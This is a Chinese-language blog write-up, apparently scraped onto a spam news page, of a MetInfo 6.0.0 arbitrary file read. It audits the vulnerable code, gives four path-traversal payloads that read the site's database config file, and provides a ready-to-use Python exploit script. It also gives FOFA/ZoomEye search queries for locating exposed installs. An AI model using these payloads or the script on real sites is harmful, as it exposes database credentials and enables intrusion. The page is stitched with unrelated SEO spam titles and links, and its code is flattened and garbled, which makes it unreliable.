当前位置: 首页 > news >正文

四川网站排名湖北项目备案查询系统

news 2025/9/17 4:42:37
四川网站排名,湖北项目备案查询系统,一起做网店怎么拿货,做电影下载网站赚钱感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规 文章目录 1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现代码审计漏洞点 1.5、深度利用EXP编写 1.6、漏洞挖掘1.7修复建议 1.1、漏洞描述 漏洞名称:MetInfo任意文件…

感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规

文章目录

      • 1.1、漏洞描述
      • 1.2、漏洞等级
      • 1.3、影响版本
      • 1.4、漏洞复现
        • 代码审计
        • 漏洞点
      • 1.5、深度利用
        • EXP编写
      • 1.6、漏洞挖掘
      • 1.7修复建议

1.1、漏洞描述

漏洞名称:MetInfo任意文件读取

漏洞简介:MetInfo是一套使用PHP和MySQL开发的内容管理系统,其中的/app/system/include/module/old_thumb.class.php文件存在任意文件读取漏洞,攻击者可利用该漏洞读取网站的敏感文件。

下载地址:历史版本安装文件下载 Ver_6.0.0

1.2、漏洞等级

高危

1.3、影响版本

在这里插入图片描述

影响版本:MetInfo 6.0.0

1.4、漏洞复现

代码审计
defined('IN_MET') or exit('No permission');load::sys_class('web');class old_thumb extends web{public function doshow(){global $_M;$dir = str_replace(array('../','./'), '', $_GET['dir']);if(substr(str_replace($_M['url']['site'], '', $dir),0,4) == 'http' && strpos($dir, './') === false){header("Content-type: image/jpeg");ob_start();readfile($dir);ob_flush();flush();die;}

$dir = str_replace(array(‘…/’,‘./’), ‘’, $_GET[‘dir’]);

dir变量接受来自$_GET[‘dir’]传递进来的值,用了str_replace函数做替换,将.././替换成空值

readfile($dir);

漏洞点
/include/thumb.php

使用bp进行抓包

在这里插入图片描述

测试一:

/include/thumb.php?dir=..././http/..././config/config_db.php

测试二:

/include/thumb.php?dir=.....///http/.....///config/config_db.php

测试三:

/include/thumb.php?dir=http/.....///.....///config/config_db.php

测试四:

/include/thumb.php?dir=http\..\..\config\config_db.php# 此POC 仅适用于Windows 系统,Linux 下无效  
#    只有windows以右斜杠作为文件路径分隔符

在这里插入图片描述

1.5、深度利用

EXP编写
import requests
import sysbanner = """
MetInfo 6.0.0___________.__.__           __________                   .___\_   _____/|__|  |   ____   \______   \ ____ _____     __| _/|    __)  |  |  | _/ __ \   |       _// __ \\__  \   / __ | |     \   |  |  |_\  ___/   |    |   \  ___/ / __ \_/ /_/ | \___  /   |__|____/\___  >  |____|_  /\___  >____  /\____ | \/                 \/          \/     \/     \/      \/ Usage: python3 *.py http://192.168.80.139/MetInfo6.0.0/
"""headers = {"User-Agent":   "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"
}dir_list = ["..././http/..././config/config_db.php",".....///http/.....///config/config_db.php","http/.....///.....///config/config_db.php","http\..\..\config\config_db.php"
]def attack(host):vul = "/include/thumb.php"url = host + vulres = requests.get(url = url, headers = headers)if res.status_code != 200:print(f"[INFO] {vul} is Not Exists!")exit()print(f"[INFO] {vul} is Exists!")for param in dir_list:params = {"dir":  param }res = requests.get(url = url, params = params, headers = headers)print(f"[INFO] Test URL: {res.url}")if "<?php" in res.text:print("[RESULT] The target is vulnreable!")print(f"[RESULT]\n{res.text}")breakif len(sys.argv) < 2:print(banner)exit()host = sys.argv[1]attack(host = host)

在这里插入图片描述

1.6、漏洞挖掘

FOFA

app="metinfo"

ZoomEye

app:"MetInfo"
app:"MetInfo"+os:"Windows"

1.7修复建议

  • 升级
  • 打补丁
http://www.yayakq.cn/news/88862/

相关文章:

  • 压铸东莞网站建设沈阳网站建设莫道网络
  • 家居企业网站建设精英建设门户网站需要注意什么
  • 怎么做一个手机网站中国建设银行网站下载安装
  • 网站建设印花税税率网页游戏平台返利
  • 山东网站建设模板制作wordpress支持视频播放器插件
  • 网站设置flash插件网站建设与维护案例
  • 深圳网站设计公司有哪些dede网站搬家
  • 重庆建网站优化做超链接的网站
  • 山西建设厅官方网站在线网页制作diy
  • 西安网站建站做国际贸易有哪些平台
  • 小程序后台开发教程温州快速排名优化
  • 新乡网站建设找哪家wordpress php 链接地址
  • 没有域名可以做网站北京网站搜索优化
  • 做门户网站建设多少钱如何制作一个好网站
  • 大兴网站建设优化seo广州网站优化外包
  • 做拼图字的网站wordpress 后台主题
  • 佛山附近做网站的公司网站开发企业培训
  • 网站开发名片怎么做公司网站生成二维码
  • 宣城市网站建设wordpress给文章添加固定字段
  • 锦州市网站建设视频网站VIP卡怎么做赠品
  • 常用来做网站首业的是摄影网站设计与制作
  • 网站布局教程长沙英文网站建设公司
  • 成都医院手机网站建设it外包的收益主要有哪些
  • 网站管理建设落实报告找做网站的个人
  • 齐诺网站建设东莞网站建设做网站seo优化官网
  • 平凉建设局网站看案例网站
  • 网站建设服务协议书建设网站有哪些参考文献
  • 建设一个网站主要受哪些因素的影响因素动漫制作和动漫设计的区别
  • 江苏省建设厅官网网站首页html做的网站怎么弄
  • 内蒙古网站seo电子商务网站建设一体化教案